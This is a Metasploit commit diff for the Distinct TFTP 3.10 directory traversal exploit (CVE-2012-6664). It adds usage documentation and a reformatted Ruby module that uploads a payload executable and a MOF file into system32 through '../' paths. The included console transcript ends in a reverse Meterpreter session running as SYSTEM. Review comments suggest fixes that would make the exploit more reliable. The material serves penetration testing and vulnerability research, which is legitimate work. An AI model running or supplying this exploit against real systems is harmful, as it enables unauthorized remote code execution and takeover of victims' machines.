Landing rapid7#13456, distinct_tftp_traversal: increase delay between upload requests
adfoster-r7 committed May 15, 2020
2 parents fa73d09 + a525007 commit 9c249e8
Showing 2 changed files with 299 additions and 69 deletions.
229 changes: 229 additions & 0 deletions documentation/modules/exploit/windows/tftp/distinct_tftp_traversal.md
@@ -0,0 +1,229 @@
## Vulnerable Application

This module exploits a directory traversal vulnerability in the TFTP
Server component of Distinct Intranet Servers version 3.10 which
allows a remote attacker to write arbitrary files to the server file
system, resulting in code execution under the context of 'SYSTEM'.
This module has been tested successfully on TFTP Server version 3.10
on Windows XP SP3 (EN).

Download:

* https://www.exploit-db.com/apps/00064d0e83691e64ec1b1f8f25627010-Intranet-Servers-310-Setup.exe

## Verification Steps

Setup:

1. Install Distinct Intranet Servers
2. Launch TFTP Server
3. Select `Configure` -> `TFTP` from the application menu
4. Set the root directory to `C:\\some\\path`
5. Check `Enable TFTP Server`
6. Pres `OK` to apply settings

Exploitation:

1. Start `msfconsole`
2. `use exploit/windows/tftp/distinct_tftp_traversal`
3. `set RHOSTS <rhost>`
4. `set DEPTH 10`
5. `run`
6. You should receive a session


## Options

### DEPTH

Levels to reach base directory. (Default: `10`)


## Scenarios

### Microsoft Windows XP SP3 (EN)

```
msf5 > use exploit/windows/tftp/distinct_tftp_traversal
msf5 exploit(windows/tftp/distinct_tftp_traversal) > set rhosts 172.16.191.205
rhosts => 172.16.191.205
msf5 exploit(windows/tftp/distinct_tftp_traversal) > run
[*] Started reverse TCP handler on 172.16.191.165:4444
[*] Sending EXE (73802 bytes)
[*] Started TFTP client listener on 0.0.0.0:6867
[*] Listening for incoming ACKs
[*] WRQ accepted, sending the file.
[*] Source file: (Data), destination file: ../../../../../../../../../../\WINDOWS\system32\kRzdfnrUu.exe
[*] Sending 73802 bytes (145 blocks)
[*] Sent 512 bytes in block 1
[*] Sent 512 bytes in block 2
[*] Sent 512 bytes in block 3
[*] Sent 512 bytes in block 4
[*] Sent 512 bytes in block 5
[*] Sent 512 bytes in block 6
[*] Sent 512 bytes in block 7
[*] Sent 512 bytes in block 8
[*] Sent 512 bytes in block 9
[*] Sent 512 bytes in block 10
[*] Sent 512 bytes in block 11
[*] Sent 512 bytes in block 12
[*] Sent 512 bytes in block 13
[*] Sent 512 bytes in block 14
[*] Sent 512 bytes in block 15
[*] Sent 512 bytes in block 16
[*] Sent 512 bytes in block 17
[*] Sent 512 bytes in block 18
[*] Sent 512 bytes in block 19
[*] Sent 512 bytes in block 20
[*] Sent 512 bytes in block 21
[*] Sent 512 bytes in block 22
[*] Sent 512 bytes in block 23
[*] Sent 512 bytes in block 24
[*] Sent 512 bytes in block 25
[*] Sent 512 bytes in block 26
[*] Sent 512 bytes in block 27
[*] Sent 512 bytes in block 28
[*] Sent 512 bytes in block 29
[*] Sent 512 bytes in block 30
[*] Sent 512 bytes in block 31
[*] Sent 512 bytes in block 32
[*] Sent 512 bytes in block 33
[*] Sent 512 bytes in block 34
[*] Sent 512 bytes in block 35
[*] Sent 512 bytes in block 36
[*] Sent 512 bytes in block 37
[*] Sent 512 bytes in block 38
[*] Sent 512 bytes in block 39
[*] Sent 512 bytes in block 40
[*] Sent 512 bytes in block 41
[*] Sent 512 bytes in block 42
[*] Sent 512 bytes in block 43
[*] Sent 512 bytes in block 44
[*] Sent 512 bytes in block 45
[*] Sent 512 bytes in block 46
[*] Sent 512 bytes in block 47
[*] Sent 512 bytes in block 48
[*] Sent 512 bytes in block 49
[*] Sent 512 bytes in block 50
[*] Sent 512 bytes in block 51
[*] Sent 512 bytes in block 52
[*] Sent 512 bytes in block 53
[*] Sent 512 bytes in block 54
[*] Sent 512 bytes in block 55
[*] Sent 512 bytes in block 56
[*] Sent 512 bytes in block 57
[*] Sent 512 bytes in block 58
[*] Sent 512 bytes in block 59
[*] Sent 512 bytes in block 60
[*] Sent 512 bytes in block 61
[*] Sent 512 bytes in block 62
[*] Sent 512 bytes in block 63
[*] Sent 512 bytes in block 64
[*] Sent 512 bytes in block 65
[*] Sent 512 bytes in block 66
[*] Sent 512 bytes in block 67
[*] Sent 512 bytes in block 68
[*] Sent 512 bytes in block 69
[*] Sent 512 bytes in block 70
[*] Sent 512 bytes in block 71
[*] Sent 512 bytes in block 72
[*] Sent 512 bytes in block 73
[*] Sent 512 bytes in block 74
[*] Sent 512 bytes in block 75
[*] Sent 512 bytes in block 76
[*] Sent 512 bytes in block 77
[*] Sent 512 bytes in block 78
[*] Sent 512 bytes in block 79
[*] Sent 512 bytes in block 80
[*] Sent 512 bytes in block 81
[*] Sent 512 bytes in block 82
[*] Sent 512 bytes in block 83
[*] Sent 512 bytes in block 84
[*] Sent 512 bytes in block 85
[*] Sent 512 bytes in block 86
[*] Sent 512 bytes in block 87
[*] Sent 512 bytes in block 88
[*] Sent 512 bytes in block 89
[*] Sent 512 bytes in block 90
[*] Sent 512 bytes in block 91
[*] Sent 512 bytes in block 92
[*] Sent 512 bytes in block 93
[*] Sent 512 bytes in block 94
[*] Sent 512 bytes in block 95
[*] Sent 512 bytes in block 96
[*] Sent 512 bytes in block 97
[*] Sent 512 bytes in block 98
[*] Sent 512 bytes in block 99
[*] Sent 512 bytes in block 100
[*] Sent 512 bytes in block 101
[*] Sent 512 bytes in block 102
[*] Sent 512 bytes in block 103
[*] Sent 512 bytes in block 104
[*] Sent 512 bytes in block 105
[*] Sent 512 bytes in block 106
[*] Sent 512 bytes in block 107
[*] Sent 512 bytes in block 108
[*] Sent 512 bytes in block 109
[*] Sent 512 bytes in block 110
[*] Sent 512 bytes in block 111
[*] Sent 512 bytes in block 112
[*] Sent 512 bytes in block 113
[*] Sent 512 bytes in block 114
[*] Sent 512 bytes in block 115
[*] Sent 512 bytes in block 116
[*] Sent 512 bytes in block 117
[*] Sent 512 bytes in block 118
[*] Sent 512 bytes in block 119
[*] Sent 512 bytes in block 120
[*] Sent 512 bytes in block 121
[*] Sent 512 bytes in block 122
[*] Sent 512 bytes in block 123
[*] Sent 512 bytes in block 124
[*] Sent 512 bytes in block 125
[*] Sent 512 bytes in block 126
[*] Sent 512 bytes in block 127
[*] Sent 512 bytes in block 128
[*] Sent 512 bytes in block 129
[*] Sent 512 bytes in block 130
[*] Sent 512 bytes in block 131
[*] Sent 512 bytes in block 132
[*] Sent 512 bytes in block 133
[*] Sent 512 bytes in block 134
[*] Sent 512 bytes in block 135
[*] Sent 512 bytes in block 136
[*] Sent 512 bytes in block 137
[*] Sent 512 bytes in block 138
[*] Sent 512 bytes in block 139
[*] Sent 512 bytes in block 140
[*] Sent 512 bytes in block 141
[*] Sent 512 bytes in block 142
[*] Sent 512 bytes in block 143
[*] Sent 512 bytes in block 144
[*] Sent 74 bytes in block 145
[*] Transferred 73802 bytes in 145 blocks, upload complete!
[*] Sending MOF (2221 bytes)
[*] Started TFTP client listener on 0.0.0.0:59069
[*] Listening for incoming ACKs
[*] WRQ accepted, sending the file.
[*] Source file: (Data), destination file: ../../../../../../../../../../\WINDOWS\system32\wbem\mof\OEEXjgTIL.mof
[*] Sending 2221 bytes (5 blocks)
[*] Sent 512 bytes in block 1
[*] Sent 512 bytes in block 2
[*] Sent 512 bytes in block 3
[*] Sent 512 bytes in block 4
[*] Sent 173 bytes in block 5
[*] Transferred 2221 bytes in 5 blocks, upload complete!
[*] Sending stage (176195 bytes) to 172.16.191.205
[*] Meterpreter session 1 opened (172.16.191.165:4444 -> 172.16.191.205:1247) at 2020-05-14 00:43:03 -0400
[!] This exploit may require manual cleanup of 'kRzdfnrUu.exe' on the target
[!] This exploit may require manual cleanup of 'wbem\mof\good\OEEXjgTIL.mof' on the target
meterpreter >
[+] Deleted wbem\mof\good\OEEXjgTIL.mof
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```
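
Review bot: step 6 of the setup list has a typo ("Pres `OK`" should be "Press `OK`"), and step 4 writes the root directory as `C:\\some\\path`; Markdown does not process backslash escapes inside inline code, so this renders with doubled backslashes and should read `C:\some\path`. Two smaller points on the same file: the Options entry for DEPTH only repeats the one-line option description ("Levels to reach base directory") without saying what the number is, namely the count of `../` segments prepended to the destination path (the scenario shows ten of them in front of `\WINDOWS\system32\...`), so a sentence tying it to the configured TFTP root would help; and the Scenarios transcript could drop the 145 near-identical "Sent 512 bytes in block N" lines so the reader sees the two uploads, the session and the cleanup output at a glance.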

139 changes: 70 additions & 69 deletions modules/exploits/windows/tftp/distinct_tftp_traversal.rb
@@ -9,95 +9,96 @@ class MetasploitModule < Msf::Exploit::Remote
include Rex::Proto::TFTP
include Msf::Exploit::EXE
include Msf::Exploit::WbemExec
include Msf::Exploit::FileDropper

def initialize(info={})
super(update_info(info,
'Name' => "Distinct TFTP 3.10 Writable Directory Traversal Execution",
'Description' => %q{
This module exploits a vulnerability found in Distinct TFTP server. The
software contains a directory traversal vulnerability that allows a remote
attacker to write arbitrary file to the file system, which results in
code execution under the context of 'SYSTEM'.
},
'License' => MSF_LICENSE,
'Author' =>
[
'modpr0be', #Initial discovery, PoC (Tom Gregory)
'sinn3r' #Metasploit
],
'References' =>
[
['OSVDB', '80984'],
['EDB', '18718'],
['URL', 'http://www.spentera.com/advisories/2012/SPN-01-2012.pdf'],
['CVE', '2012-6664']
],
'Payload' =>
{
'BadChars' => "\x00",
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Distinct TFTP 3.10 Writable Directory Traversal Execution',
'Description' => %q{
This module exploits a directory traversal vulnerability in the TFTP
Server component of Distinct Intranet Servers version 3.10 which
allows a remote attacker to write arbitrary files to the server file
system, resulting in code execution under the context of 'SYSTEM'.
This module has been tested successfully on TFTP Server version 3.10
on Windows XP SP3 (EN).
},
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Platform' => 'win',
'Targets' =>
[
['Distinct TFTP 3.10 on Windows', {}]
],
'Privileged' => false,
'DisclosureDate' => "Apr 8 2012",
'DefaultTarget' => 0))
'License' => MSF_LICENSE,
'Author' =>
[
'modpr0be', # Initial discovery, PoC (Tom Gregory)
'sinn3r' # Metasploit
],
'References' =>
[
['OSVDB', '80984'],
['EDB', '18718'],
['URL', 'http://www.spentera.com/advisories/2012/SPN-01-2012.pdf'],
['CVE', '2012-6664']
],
'Payload' =>
{
'BadChars' => "\x00"
},
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Platform' => 'win',
'Targets' =>
[
['Automatic', { 'auto' => true }],
],
'Privileged' => true,
'DisclosureDate' => '2012-04-08',
'DefaultTarget' => 0
)
)

register_options([
OptInt.new('DEPTH', [false, "Levels to reach base directory",10]),
OptAddress.new('RHOST', [true, "The remote TFTP server address"]),
OptPort.new('RPORT', [true, "The remote TFTP server port", 69])
OptInt.new('DEPTH', [false, 'Levels to reach base directory', 10]),
OptAddress.new('RHOST', [true, 'The remote TFTP server address']),
OptPort.new('RPORT', [true, 'The remote TFTP server port', 69])
])
end

def upload(filename, data)
tftp_client = Rex::Proto::TFTP::Client.new(
"LocalHost" => "0.0.0.0",
"LocalPort" => 1025 + rand(0xffff-1025),
"PeerHost" => datastore['RHOST'],
"PeerPort" => datastore['RPORT'],
"LocalFile" => "DATA:#{data}",
"RemoteFile" => filename,
"Mode" => "octet",
"Context" => {'Msf' => self.framework, "MsfExploit" => self },
"Action" => :upload
'LocalHost' => '0.0.0.0',
'LocalPort' => 1025 + rand(0xffff - 1025),
'PeerHost' => datastore['RHOST'],
'PeerPort' => datastore['RPORT'],
'LocalFile' => "DATA:#{data}",
'RemoteFile' => filename,
'Mode' => 'octet',
'Context' => { 'Msf' => framework, 'MsfExploit' => self },
'Action' => :upload
)

ret = tftp_client.send_write_request { |msg| print_status(msg) }
while not tftp_client.complete
tftp_client.send_write_request { |msg| print_status(msg) }
until tftp_client.complete
select(nil, nil, nil, 1)
tftp_client.stop
end
end

def exploit
peer = "#{datastore['RHOST']}:#{datastore['RPORT']}"

# Setup the necessary files to do the wbemexec trick
exe_name = rand_text_alpha(rand(10)+5) + '.exe'
exe = generate_payload_exe
mof_name = rand_text_alpha(rand(10)+5) + '.mof'
mof = generate_mof(mof_name, exe_name)

# Configure how deep we want to traverse
depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']
levels = "../" * depth
exe_name = "#{rand_text_alpha(8..15)}.exe"
exe = generate_payload_exe
mof_name = "#{rand_text_alpha(8..15)}.mof"
mof = generate_mof(mof_name, exe_name)
traversal = '../' * datastore['DEPTH'].to_i

# Upload the malicious executable to C:\Windows\System32\
print_status("#{peer} - Uploading executable (#{exe.length.to_s} bytes)")
upload("#{levels}WINDOWS\\system32\\#{exe_name}", exe)
print_status("Sending EXE (#{exe.length} bytes)")
upload("#{traversal}\\WINDOWS\\system32\\#{exe_name}", exe)
register_file_for_cleanup(exe_name)

# Let the TFTP server idle a bit before sending another file
select(nil, nil, nil, 1)
select(nil, nil, nil, 3)

# Upload the mof file
print_status("#{peer} - Uploading .mof...")
upload("#{levels}WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof)
print_status("Sending MOF (#{mof.length} bytes)")
upload("#{traversal}\\WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof)
register_file_for_cleanup("wbem\\mof\\good\\#{mof_name}")
end
end
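
Review bot: the rewrite of the traversal depth drops the guard the old code had. `traversal = '../' * datastore['DEPTH'].to_i` replaces `depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']`, and because DEPTH is registered as optional (`OptInt.new('DEPTH', [false, ...])`), an unset or zero value now yields an empty `traversal`, so both files land in the TFTP root directory instead of `\WINDOWS\system32`. Either keep the fallback to 10 or validate `DEPTH > 0` before building the path. Two further points: `upload` no longer keeps the result of `send_write_request` (the old `ret =` was dropped and was unused anyway), and neither version checks whether the write request was accepted, so `exploit` goes on to send the MOF and register both files for cleanup even when the EXE upload failed; consider returning the client's status from `upload` and calling `fail_with` on a rejected WRQ. Finally, the pause this commit is about, `select(nil, nil, nil, 3)`, is a bare literal; the comment above it only says "idle a bit", so a sentence on why three seconds is needed, or an advanced option for the delay, would make the tuning discoverable.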
